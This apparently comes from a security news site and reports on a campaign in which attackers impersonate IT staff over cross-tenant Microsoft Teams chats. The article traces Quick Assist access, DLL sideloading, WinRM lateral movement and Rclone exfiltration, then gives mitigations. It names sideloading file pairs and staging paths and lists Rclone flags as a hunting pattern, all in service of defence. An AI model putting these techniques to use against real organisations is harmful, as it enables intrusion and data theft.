Threat actors are abusing Microsoft Teams’ external collaboration features to impersonate IT helpdesk personnel, manipulate users into granting remote access, and execute a full-chain intrusion from initial social engineering to credential-backed lateral movement and cloud-based data exfiltration.
Microsoft’s Security Blog published detailed technical findings on April 17, 2026, confirming that threat actors are actively initiating cross-tenant Microsoft Teams communications while masquerading as internal support staff to socially engineer employees into providing remote desktop access.
This campaign represents one of the most operationally stealthy enterprise attack chains documented to date, leveraging entirely legitimate tools and protocols to blend into routine IT support activity throughout every phase of the intrusion.
Teams as a Phishing Vector
The intrusion chain starts with a deceptively simple tactic. Attackers operating from a separately controlled Microsoft tenant initiate a Teams chat with targeted employees, impersonating IT support or helpdesk personnel.
Because the contact arrives through a trusted enterprise collaboration platform rather than traditional email, it bypasses the natural skepticism employees associate with unsolicited phishing emails.
Microsoft Teams does display external sender warnings, including Accept/Block screens, first-contact notices, and spam phishing alerts, but this attack relies on convincing users to ignore those warnings entirely.
Voice phishing (vishing) is frequently layered on top of the Teams messages to add urgency and authenticity. Common lures observed include “Microsoft Security Update,” “Account Verification,” and “Spam Filter Update” pretexts designed to manufacture a false emergency and pressure users into action.
Notably, attackers exploit a relatively new default-enabled Microsoft feature described in update MC1182004, which allows any Teams user to initiate a chat with any email address, instantly forming a cross-tenant connection when the recipient accepts. Once that connection is established, the social engineering process begins in earnest.
Remote Access Foothold
With social engineering complete, the attacker instructs the victim to open Quick Assist, enter a supplied security code, and approve all elevation prompts. This step is often completed in under sixty seconds. From the attacker’s perspective, approval of the Quick Assist session delivers full interactive control of the endpoint.
This tactic has previously been linked to threat actors, including Storm-1811, a financially motivated group tracked by Microsoft since mid-2024 for systematically targeting enterprise environments through Quick Assist abuse.
More recently, the Black Basta and Cactus ransomware groups have adopted identical techniques, amassing over $107 million in Bitcoin ransom payments since October 2024 through Teams-plus-Quick Assist intrusion chains.
Once interactive control is achieved, attackers typically spend 30–120 seconds performing rapid reconnaissance, executing commands via cmd.exe and PowerShell to verify user privileges, confirm domain affiliation, gather system information, and assess network reachability.
DLL Sideloading and Payload Execution
After reconnaissance, the intrusion transitions into persistent execution. Attackers stage a small payload bundle in directories such as C:\ProgramData\Adobe\ARM\ CProgramData\Microsoft\DeviceSync\, then invoke trusted vendors to sideload attacker-supplied malicious DLLs. Observed examples include:
AcroServicesUpdater2_x64.exeloading a stagedmsi.dllADNotificationManager.exeloadingvcruntime140_1.dllDlpUserAgent.exeloadingmpclient.dll
This DLL sideloading technique allows attacker-controlled code to execute under a trusted application’s context, effectively masking malicious behavior from endpoint detection tools.
An encrypted configuration value is then written to a user-context registry key, enabling a fileless in-memory loader consistent with the Havoc command-and-control framework to reconstruct execution context and C2 configuration without writing additional files to disk.
Lateral Movement via WinRM and Domain Controller Targeting
Command-and-control is established via outbound HTTPS (TCP/443) connections from the sideloaded process to dynamically hosted cloud-backed attacker infrastructure, deliberately mimicking legitimate application update traffic. From this externally directed foothold, the attacker pivots internally.
Using Windows Remote Management (WinRM) over TCP port 5985, the threat actor moves laterally from the initially compromised endpoint toward high-value domain infrastructure, including Active Directory domain controllers.
This credential-backed lateral movement uses native administrative protocols, making it extraordinarily difficult to distinguish from authorized administrative activity without behavioral telemetry correlation across identity, endpoint, and collaboration signals.
Following lateral movement, attackers remotely install additional commercial remote management software via msiexec.exe, establishing a redundant control channel independent of the original implant, ensuring persistence even if early-stage payloads are discovered and removed.
Data Exfiltration via Rclone to External Cloud Storage
In the final observed stage, threat actors use Rclone a widely available open-source file synchronization utility to systematically transfer business-relevant documents from internal network shares to external cloud storage.
File-type exclusions within the Rclone transfer parameters indicate a deliberately targeted exfiltration effort designed to maximize the value of stolen data while minimizing transfer size and detection probability.
Microsoft Defender for Endpoint may flag this activity as possible data exfiltration involving uncommon synchronization tooling, though the use of legitimate utilities continues to challenge traditional signature-based detection approaches.
Mitigation
Organizations should implement layered defenses to disrupt this intrusion chain at multiple stages:
- Review cross-tenant Teams collaboration policies and restrict external messaging to verified, allowlisted organizations, where business necessity does not require open external chat
- Disable or restrict Quick Assist to authorized IT roles only, and educate users never to approve remote access sessions from unsolicited contacts
- Enable Attack Surface Reduction (ASR) rules in block mode, and deploy Windows Defender Application Control (WDAC) policies to prevent DLL sideloading from user-writable directories such as ProgramData and AppData.
- Enforce Conditional Access policies requiring MFA and compliant device verification for all administrative roles, and restrict WinRM to designated management workstations.
- Enable Safe Links for Teams conversations and ensure Zero-hour Auto Purge (ZAP) is active to quarantine flagged messages retroactively.
- Establish verbal helpdesk authentication codes, internal phrases that an attacker impersonating IT support is unlikely to know, and train staff to verify external sender indicators before accepting any remote assistance session.
- Deploy Microsoft Defender’s Automatic Attack Disruption capability, which can suspend originating user sessions and contain compromised accounts before domain controller interaction when credential-backed WinRM lateral movement is detected following a Quick Assist session.
Microsoft Defender XDR provides correlated visibility across identity, endpoint, and collaboration telemetry, surfacing the entire attack chain as a single, unified, multi-stage incident rather than dozens of disconnected alerts, enabling security operations teams to detect and disrupt the intrusion before it escalates into enterprise-wide compromise.
FAQ
Q1: How do attackers initiate contact through Microsoft Teams without being detected?
Attackers create or control external Microsoft tenants, set display names to impersonate IT helpdesk staff, and initiate chats that exploit Teams’ cross-tenant collaboration feature, banking on users ignoring warnings about external senders and Accept/Block prompts.
Q2: Why is Quick Assist particularly dangerous in this attack chain?
Quick Assist is a legitimate, Microsoft-signed remote support tool built into Windows, making its execution appear non-suspicious; once a user approves a session, attackers gain full interactive control of the endpoint within seconds, bypassing most endpoint security controls.
Q3: What makes DLL sideloading through trusted applications so difficult to detect?
Because a legitimate, vendor-signed executable loads the malicious DLL, the malicious code inherits the trusted application’s execution context, effectively evading security tools that rely on process reputation and file signing to distinguish benign from malicious activity.
Q4: How can organizations detect Rclone-based data exfiltration before data leaves the network?
Security teams should hunt for rclone.exe process execution with transfer flags such as --transfers 16, --config rclone_uploader.conf, and --exclude *.mdf, and configure Microsoft Defender XDR custom detections to alert on synchronization utilities connecting to external cloud storage from non-standard processes.
Site: thecybrdef.com
About the Author
